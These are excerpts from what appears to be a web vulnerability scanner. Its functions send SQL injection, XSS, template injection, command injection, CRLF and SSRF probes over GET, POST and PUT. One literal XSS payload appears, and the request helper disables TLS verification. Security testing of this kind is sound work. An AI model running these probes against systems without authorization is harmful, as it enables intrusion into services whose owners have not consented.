Example #1
 def Put(url):
     """Check each query parameter of ``url`` for error-based SQL injection over PUT.

     For every parameter/payload pair a baseline PUT is sent and stored with
     ``save_request``, then a second PUT carries the payload appended to the
     parameter.  A finding is reported when any ``sql_err`` pattern matches
     more often in the probe response than in the stored baseline.

     Returns the finding as a dict on the first hit, otherwise ``None``.
     Raises ``IndexError`` when ``url`` has no ``?`` query part.
     """
     endpoint = url.split('?')[0]
     for param in url.split('?')[1].split('&'):
         for payload in sqli_payloads:
             # A 0 from post_data()/nq.Put() abandons this parameter
             # (presumably an error sentinel -- confirm against the helpers).
             if post_data(urlparse(url).query) == 0:
                 break
             baseline = nq.Put(url, post_data(urlparse(url).query))
             if baseline == 0:
                 break
             save_request.save(baseline)
             # NOTE(review): str.replace() rewrites every occurrence of the
             # "name=value" text in the URL, not only the query parameter.
             data = urlparse(url.replace(param, param + payload)).query
             probe = nq.Put(endpoint, post_data(data))
             if probe == 0:
                 break
             for _label, pattern in sql_err.items():
                 needle = pattern.encode('utf-8')
                 stored_hits = findall(needle, save_request.get().content)
                 probe_hits = findall(needle, probe.content)
                 # Only a rise in error-signature matches counts, so pages
                 # that already contain the text are not flagged.
                 if len(probe_hits) > len(stored_hits):
                     bug = {
                         'name': 'SQL injection',
                         'payload': payload,
                         'method': 'PUT',
                         'parameter': param,
                         'target': endpoint,
                         'data': data
                     }
                     show.bug(bug='SQL injection',
                              payload=payload,
                              method='PUT',
                              parameter=param,
                              target=endpoint,
                              link=data)
                     return bug
     return None
Example #2
 def Post(url):
     """Check each query parameter of ``url`` for error-based SQL injection over POST.

     A baseline POST is stored with ``save_request`` and compared with a POST
     whose body has the payload appended to one parameter.  A finding is
     printed through ``show.bug`` when a ``sql_err`` pattern matches more
     often in the probe response than in the baseline.  Returns ``None``.
     """
     endpoint = url.split('?')[0]
     for param in url.split('?')[1].split('&'):
         for payload in sqli_payloads:
             # A 0 from post_data()/nq.Post() abandons this parameter
             # (presumably an error sentinel -- confirm against the helpers).
             if post_data(urlparse(url).query) == 0:
                 break
             baseline = nq.Post(url, post_data(urlparse(url).query))
             if baseline == 0:
                 break
             save_request.save(baseline)
             data = urlparse(url.replace(param, param + payload)).query
             probe = nq.Post(endpoint, post_data(data))
             if probe == 0:
                 break
             for _label, pattern in sql_err.items():
                 needle = pattern.encode('utf-8')
                 stored_hits = findall(needle, save_request.get().content)
                 probe_hits = findall(needle, probe.content)
                 if len(probe_hits) > len(stored_hits):
                     show.bug(bug='SQL injection',
                              payload=payload,
                              method='POST',
                              parameter=param,
                              target=endpoint,
                              link=data)
                     # NOTE(review): this leaves only the sql_err loop; the
                     # remaining payloads are still sent for the same
                     # parameter, so one issue can be reported several times.
                     break
Example #3
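 def Put(url):
     """Check each query parameter of ``url`` for reflected XSS over PUT.

     The scan runs only when ``methods.Put`` returns 1 for the endpoint and
     ``refxss.Put`` returns 1 for the URL.  Each payload is appended to one
     parameter and sent as the PUT body; a finding is reported when the raw
     payload bytes appear in the response body.

     Returns the finding as a dict on the first hit, otherwise ``None``.
     """
     endpoint = url.split('?')[0]
     mt = methods.Put(endpoint, urlparse(url).query)
     # refxss.Put() is consulted only once methods.Put() has returned 1.
     if mt != 1 or refxss.Put(url) != 1:
         return None
     for param in url.split('?')[1].split('&'):
         for payload in xss_payloads:
             data = urlparse(url.replace(param, param + payload)).query
             if post_data(data) == 0:
                 break
             req = nq.Put(endpoint, post_data(data))
             if req == 0:
                 break
             # A byte-for-byte echo shows the value comes back unencoded; it
             # says nothing about the response content type or the context
             # the value lands in, so findings still need triage.
             if payload.encode('utf-8') in req.content:
                 bug = {
                     # Spelling fixed ('Corss-site') so the returned record
                     # matches the name passed to show.bug() below.
                     'name': 'Cross-site scripting',
                     'payload': payload,
                     'method': 'PUT',
                     'parameter': param,
                     'target': endpoint,
                     'data': data
                 }
                 show.bug(bug='Cross-site scripting',
                          payload=payload,
                          method='PUT',
                          parameter=param,
                          target=endpoint,
                          link=data)
                 return bug
     return None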
Example #4
 def Put(url):
     """Check each query parameter of ``url`` for template injection over PUT.

     Runs only when ``methods.Put(url)`` returns 1.  ``ssti_payloads`` maps a
     payload to the text expected in the response; a finding is reported when
     that text occurs more often in the probe response than in a baseline PUT
     sent just before it.

     Returns the finding as a dict on the first hit, otherwise ``None``.
     """
     if methods.Put(url) != 1:
         return None
     endpoint = url.split('?')[0]
     for param in url.split('?')[1].split('&'):
         for payload, message in ssti_payloads.items():
             if post_data(urlparse(url).query) == 0:
                 break
             baseline = nq.Put(endpoint, post_data(urlparse(url).query))
             if baseline == 0:
                 break
             marker = message.encode('utf-8')
             baseline_hits = len(findall(marker, baseline.content))
             data = urlparse(url.replace(param, param + payload)).query
             probe = nq.Put(endpoint, post_data(data))
             if probe == 0:
                 break
             # Comparing counts keeps pages that already contain the marker
             # text from being flagged.
             if len(findall(marker, probe.content)) > baseline_hits:
                 bug = {
                     'name': 'template injection',
                     'payload': payload,
                     'method': 'PUT',
                     'parameter': param,
                     'target': endpoint,
                     'data': data
                 }
                 show.bug(bug='template injection',
                          payload=payload,
                          method='PUT',
                          parameter=param,
                          target=endpoint,
                          link=data)
                 return bug
     return None
Example #5
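 def Put(url,data=None):
     """Report whether the endpoint of ``url`` answers PUT with anything but 405.

     The query string of ``url`` is sent as the PUT body.  Returns 1 when the
     status code is not 405 and 0 otherwise, including when the request or
     the body parsing fails.  ``data`` is accepted but not used.
     """
     try:
         response = nq.Put(url.split('?')[0], post_data(urlparse(url).query))
         return 1 if response.status_code != 405 else 0
     except Exception:
         # Was a bare ``except:``, which also swallowed KeyboardInterrupt and
         # SystemExit and turned an operator abort into "PUT not allowed".
         return 0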
Example #6
 def Put(url):
     """Check each query parameter of ``url`` for reflected XSS over PUT.

     Each payload from ``xss_payloads`` is appended to one parameter and sent
     as the PUT body.  The first payload whose raw bytes appear in the
     response is printed through ``show.bug`` and the scan moves on to the
     next parameter.  Returns ``None``.
     """
     endpoint = url.split('?')[0]
     for param in url.split('?')[1].split('&'):
         for payload in xss_payloads:
             data = urlparse(url.replace(param, param + payload)).query
             if post_data(data) == 0:
                 break
             response = nq.Put(endpoint, post_data(data))
             if response == 0:
                 break
             # An unencoded echo is the only signal used here; the response
             # content type and rendering context are not inspected.
             if payload.encode('utf-8') not in response.content:
                 continue
             show.bug(bug='Cross-site scripting',
                      payload=payload,
                      method='PUT',
                      parameter=param,
                      target=endpoint,
                      link=data)
             break
Example #7
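 def Put(url):
     """Report whether a marker added to every parameter is echoed in a PUT response body.

     The literal ``scantrrr`` is appended to each ``name=value`` pair of
     ``url`` and the result is sent as a PUT body.  Returns 1 when the marker
     appears (case-insensitively) in the decoded response body, otherwise 0.
     Any failure, including a URL without a query part, also yields 0.
     """
     try:
         for param in url.split('?')[1].split('&'):
             url = url.replace(param, f'{param}scantrrr')
         # NOTE(review): post_data() receives the whole URL here rather than
         # only its query string -- confirm that is what the helper expects.
         r = nq.Put(url.split('?')[0], post_data(url))
         return 1 if 'scantrrr' in r.content.decode().lower() else 0
     except Exception:
         # Was a bare ``except:``, which also swallowed KeyboardInterrupt and
         # SystemExit and reported an operator abort as "not reflected".
         return 0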
Example #8
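def NEON_CVE(url):
    """POST a fixed marker in parameter ``q`` to each path from ``add_path(url)``.

    A finding is printed through ``show.bug`` for every path whose response
    body contains the marker bytes unchanged.  Returns ``None``.
    """
    payload = '<img src=x onerror=alert(1)>'
    body = f'q={payload}'
    for u in add_path(url):
        r = nq.Post(u, post_data(body))
        # The nq helpers appear to return 0 when a request fails; without
        # this guard ``r.content`` raised AttributeError and ended the scan.
        if r == 0:
            continue
        if payload.encode('utf-8') in r.content:
            # NOTE(review): the request above is a POST but the finding is
            # labelled 'GET' -- confirm which method the report should name.
            show.bug(bug='Cross-site scripting',
                     payload=payload,
                     method='GET',
                     parameter='q',
                     target=u,
                     link=body)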
Example #9
def inject(host):
    """Check each query parameter of ``host`` for CRLF header injection.

    Every payload is appended to one parameter and sent three ways: in the
    URL of a GET, then as the body of a POST, then as the body of a PUT.  A
    hit is printed when the response carries a ``Header-Test`` header whose
    value is ``BLATRUC``; after a hit the remaining payloads for that
    parameter are skipped.  Returns ``None``.
    """
    endpoint = host.split('?')[0]
    params = host.split('?')[1].split('&')

    # Pass 1: payload carried in the request URL.
    for param in params:
        hit = False
        for payload in payloads:
            probe_url = host.replace(param, param + payload)
            r = nq.Get(probe_url)
            if r != 0:
                for header, value in r.headers.items():
                    # Exact-case comparison on the name as yielded by items().
                    if header == 'Header-Test' and value == 'BLATRUC':
                        print(f'[{green}CRLF{rest}] Found :> {probe_url}')
                        hit = True
            if hit:
                break

    # Passes 2 and 3: payload carried in the request body, POST then PUT.
    for send, verb in ((nq.Post, 'POST'), (nq.Put, 'PUT')):
        for param in params:
            hit = False
            for payload in payloads:
                data = urlparse(host.replace(param, param + payload)).query
                r = send(endpoint, post_data(data))
                if r != 0:
                    for header, value in r.headers.items():
                        if header == 'Header-Test' and value == 'BLATRUC':
                            print(f'[{green}CRLF{rest}] Found :> {host}\n{info} Method :> {verb}\n{info} Data :> {data}')
                            hit = True
                if hit:
                    break
Example #10
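 def Post(url):
     """Report whether a marker added to every parameter is echoed in POST response headers.

     The literal ``scantrrr`` is appended to each ``name=value`` pair of
     ``url`` and the result is sent as a POST body.  Returns 1 when the
     marker appears in any response header name or value, otherwise 0.  Any
     failure, including a URL without a query part, also yields 0.
     """
     try:
         for param in url.split('?')[1].split('&'):
             url = url.replace(param, f'{param}scantrrr')
         # NOTE(review): post_data() receives the whole URL here rather than
         # only its query string -- confirm that is what the helper expects.
         r = nq.Post(url.split('?')[0], post_data(url))
         reflected = any('scantrrr' in header or 'scantrrr' in value
                         for header, value in r.headers.items())
         return 1 if reflected else 0
     except Exception:
         # Was a bare ``except:``, which also swallowed KeyboardInterrupt and
         # SystemExit and reported an operator abort as "not reflected".
         return 0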
Example #11
 def Post(url):
     """Check each query parameter of ``url`` for template injection over POST.

     ``ssti_payloads`` maps a payload to the text expected in the response.
     A finding is printed through ``show.bug`` when that text occurs more
     often in the probe response than in a baseline POST sent just before
     it; the scan then moves on to the next parameter.  Returns ``None``.
     """
     endpoint = url.split('?')[0]
     for param in url.split('?')[1].split('&'):
         for payload, message in ssti_payloads.items():
             if post_data(urlparse(url).query) == 0:
                 break
             baseline = nq.Post(endpoint, post_data(urlparse(url).query))
             if baseline == 0:
                 break
             marker = message.encode('utf-8')
             baseline_hits = len(findall(marker, baseline.content))
             data = urlparse(url.replace(param, param + payload)).query
             probe = nq.Post(endpoint, post_data(data))
             if probe == 0:
                 break
             # Comparing counts keeps pages that already contain the marker
             # text from being flagged.
             if len(findall(marker, probe.content)) <= baseline_hits:
                 continue
             show.bug(bug='template injection',
                      payload=payload,
                      method='POST',
                      parameter=param,
                      target=endpoint,
                      link=data)
             break
Example #12
 def Put(url):
     """Probe request headers for error-based SQL injection over PUT.

     For each header name in ``SCAN_Headers`` and each payload in
     ``sqli_payloads``, a baseline PUT is sent and stored with
     ``save_request``; the request is then repeated through ``REQ`` with the
     payload appended to (or used as) that header's value.  A finding is
     printed through ``show.bug_Header`` when a ``sql_err`` pattern occurs
     more often in the probe response than in the stored baseline.
     """
     # Taken once up front; its 'headers' mapping is the template copied below.
     d = nq.Dump()
     for header in SCAN_Headers:
         for payload in sqli_payloads:
             all_headers = {}
             try:
                 # Result unused: the expression only raises IndexError when
                 # the URL has no query part, which selects the empty body.
                 url.split('?')[1].split('&')
                 data = urlparse(url).query
                 data = post_data(data)
                 if data == 0:
                     data = {}
             # NOTE(review): bare except also hides unrelated errors and
             # KeyboardInterrupt; IndexError looks like the intended case.
             except:
                 data = {}
             # Baseline goes to the full URL; the probe below goes to the
             # endpoint without its query string.
             r = nq.Put(url, data)
             if r == 0:
                 break
             save_request.save(r)
             try:
                 # Append the payload to the header's current value if one exists.
                 H = nq.Dump()['headers'][header]
                 P = f'{H}{payload}'
             except:
                 # No such header in the dump (or the lookup failed): send
                 # the payload as the whole value.
                 P = payload
             # Copy every other header unchanged; H is reused as the loop name.
             for H, V in d['headers'].items():
                 if H == header:
                     pass
                 else:
                     all_headers[H] = V
             all_headers[header] = P
             req = REQ(url.split('?')[0],
                       data=data,
                       method='PUT',
                       headers=all_headers)
             if req == 0:
                 break
             for n, e in sql_err.items():
                 r = findall(e.encode('utf-8'), save_request.get().content)
                 r2 = findall(e.encode('utf-8'), req.content)
                 # Only a rise in error-signature matches counts as a finding.
                 if len(r) < len(r2):
                     show.bug_Header(bug='SQL injection',
                                     payload=payload,
                                     method='PUT',
                                     header=header,
                                     target=url)
                     # Leaves only the sql_err loop; the payload loop carries
                     # on with the next payload for the same header.
                     break
Example #13
 def Put(url):
     """Probe request headers for command injection over PUT.

     ``rce_payloads`` maps a payload to the text expected in the response.
     For each header name in ``SCAN_Headers`` a baseline PUT is sent, then
     the request is repeated through ``REQ`` with the payload appended to
     (or used as) that header's value.  A finding is printed through
     ``show.bug_Header`` when the expected text occurs more often in the
     probe response than in the baseline.
     """
     # Taken once up front; its 'headers' mapping is the template copied below.
     d = nq.Dump()
     for header in SCAN_Headers:
         for payload, message in rce_payloads.items():
             all_headers = {}
             # Newlines are written as %0a before the payload goes into a header value.
             payload = payload.replace('\n', '%0a')
             try:
                 # Result unused: the expression only raises IndexError when
                 # the URL has no query part, which selects the empty body.
                 url.split('?')[1].split('&')
                 data = urlparse(url).query
                 data = post_data(data)
                 if data == 0:
                     data = {}
             # NOTE(review): bare except also hides unrelated errors and
             # KeyboardInterrupt; IndexError looks like the intended case.
             except:
                 data = {}
             r = nq.Put(url.split('?')[0], data)
             if r == 0:
                 break
             # r now holds the baseline match count, not the response.
             r = len(findall(message.encode('utf-8'), r.content))
             try:
                 # Append the payload to the header's current value if one exists.
                 H = nq.Dump()['headers'][header]
                 P = f'{H}{payload}'
             except:
                 # No such header in the dump (or the lookup failed): send
                 # the payload as the whole value.
                 P = payload
             # Copy every other header unchanged; H is reused as the loop name.
             for H, V in d['headers'].items():
                 if H == header:
                     pass
                 else:
                     all_headers[H] = V
             all_headers[header] = P
             req = REQ(url.split('?')[0],
                       data=data,
                       method='PUT',
                       headers=all_headers)
             if req == 0:
                 break
             # Comparing counts keeps pages that already contain the expected
             # text from being flagged.
             if r < len(findall(message.encode('utf-8'), req.content)):
                 show.bug_Header(bug='command injection',
                                 payload=payload.replace('\n', '%0a'),
                                 method='PUT',
                                 header=header,
                                 target=url)
                 # Stops the payload loop; scanning continues with the next header.
                 break
Example #14
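def new_req(method='GET',
            Dump=None,
            proxy=None,
            url=None,
            redirect=False,
            data=None,
            timeout=10,
            headers=None,
            cookies=None):
    """Send one GET, POST or PUT request and return the response object.

    Args:
        method: 'GET', 'POST' or 'PUT', in any letter case.
        Dump: when truthy, print ``dump.dump_all`` of the response.
        proxy: proxies mapping passed through as ``proxies``.
        url: request URL.
        redirect: passed through as ``allow_redirects``.
        data: body for POST/PUT; run through ``post_data`` when truthy.
        timeout: request timeout.
        headers: request headers; defaults to an empty mapping.
        cookies: request cookies.

    Raises:
        ValueError: if ``method`` is not one of the three supported verbs.
    """
    method = method.upper()
    # Reject unknown verbs up front; the original fell through every branch
    # and failed later with UnboundLocalError on ``r``.
    if method not in ('GET', 'POST', 'PUT'):
        raise ValueError('unsupported HTTP method: %r' % method)
    # A fresh dict per call instead of one mutable default shared by all calls.
    if headers is None:
        headers = {}
    if data:
        data = post_data(data)
    # NOTE(review): verify=False turns off TLS certificate verification for
    # every request, so the peer is not authenticated and any cookies or
    # headers sent can be read by an intercepting host.  Consider exposing
    # this as a parameter instead of hard-coding it.
    common = dict(url=url,
                  proxies=proxy,
                  cookies=cookies,
                  allow_redirects=redirect,
                  timeout=timeout,
                  verify=False,
                  headers=headers)
    if method == 'GET':
        r = get(**common)
    elif method == 'POST':
        r = post(data=data, **common)
    else:
        r = put(data=data, **common)
    if Dump:
        d_r = dump.dump_all(r)
        print(d_r.decode())
    return r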
Example #15
def GO(url, host):
    """Send ``ssrf_parameters`` to ``url`` in batches, each pointing at ``host``.

    Every parameter is appended to the URL as ``name=host/name``.  When the
    number of ``=`` signs in the accumulated query reaches
    ``parameters_in_one_request``, the URL is requested with GET, its query
    is sent as a POST body to the endpoint, and accumulation restarts from
    the original ``url``.  Returns ``None``; responses are not inspected.
    """
    candidate = url
    for par in ssrf_parameters:
        # '?' starts the query, '&' extends one that already exists.
        joiner = '&' if len(urlparse(candidate).query) > 0 else '?'
        candidate += f'{joiner}{par}={host}/{par}'
        # The count covers every '=' in the query, including parameters the
        # caller's URL already had.
        pair_count = len(urlparse(candidate).query.split('=')) - 1
        if pair_count == parameters_in_one_request:
            nq.Get(candidate)
            nq.Post(url.split('?')[0], post_data(urlparse(candidate).query))
            candidate = url
    # NOTE(review): parameters left over after the last full batch are never
    # sent -- confirm whether that is intended.
Example #16
 def Put(url):
     """Probe request headers for reflected XSS over PUT.

     For each header name in ``SCAN_Headers`` and each payload in
     ``xss_payloads``, a PUT is sent through ``REQ`` with the payload
     appended to (or used as) that header's value.  A finding is printed
     through ``show.bug_Header`` when the raw payload bytes appear in the
     response body.
     """
     # Taken once up front; its 'headers' mapping is the template copied below.
     d = nq.Dump()
     for header in SCAN_Headers:
         for payload in xss_payloads:
             all_headers = {}
             try:
                 # Result unused: the expression only raises IndexError when
                 # the URL has no query part, which selects the empty body.
                 url.split('?')[1].split('&')
                 data = urlparse(url).query
                 data = post_data(data)
                 if data == 0:
                     data = {}
             # NOTE(review): bare except also hides unrelated errors and
             # KeyboardInterrupt; IndexError looks like the intended case.
             except:
                 data = {}
             try:
                 # Append the payload to the header's current value if one exists.
                 H = nq.Dump()['headers'][header]
                 P = f'{H}{payload}'
             except:
                 # No such header in the dump (or the lookup failed): send
                 # the payload as the whole value.
                 P = payload
             # Copy every other header unchanged; H is reused as the loop name.
             for H, V in d['headers'].items():
                 if H == header:
                     pass
                 else:
                     all_headers[H] = V
             all_headers[header] = P
             req = REQ(url.split('?')[0],
                       data=data,
                       method='PUT',
                       headers=all_headers)
             if req == 0:
                 break
             # An unencoded echo is the only signal used here; the response
             # content type and rendering context are not inspected.
             if payload.encode('utf-8') in req.content:
                 show.bug_Header(bug='Cross-site scripting',
                                 payload=payload,
                                 method='PUT',
                                 header=header,
                                 target=url)
                 # Stops the payload loop; scanning continues with the next header.
                 break
Example #17
    except Exception as e:
        print(e)
        sys.exit()
else:
    Header = {}
# Normalise the parsed command-line options into module-level settings.
Random = bool(opts.Random)

# One proxy address is applied to both schemes.
proxy = None
if opts.proxy:
    proxy = opts.proxy
    proxy = {'http': proxy, 'https': proxy}

# The cookie string goes through post_data(); a 0 result is treated as
# invalid input and ends the program.
cookie = None
if opts.cookie:
    cookie = post_data(opts.cookie)
    if cookie == 0:
        print('\n{bad} invalid data'.format(bad=bad))
        sys.exit()

redirect = bool(opts.redirect)
if opts.List:
    List = opts.List
    try:
        List = open(List, 'r')
    except Exception as e:
        print(e)
Example #18
def GO(url, host):
    """Send every name in ``ssrf_parameters`` to the endpoint of ``url``.

    Each parameter is given the value ``host/name`` and sent three times: in
    the query string of a GET, then as the body of a POST, then as the body
    of a PUT.  Returns ``None``; responses are not inspected here.
    """
    endpoint = url.split('?')[0]
    for par in ssrf_parameters:
        pair = f'{par}={host}/{par}'
        nq.Get(f'{endpoint}/?{pair}')
        nq.Post(endpoint, post_data(pair))
        nq.Put(endpoint, post_data(pair))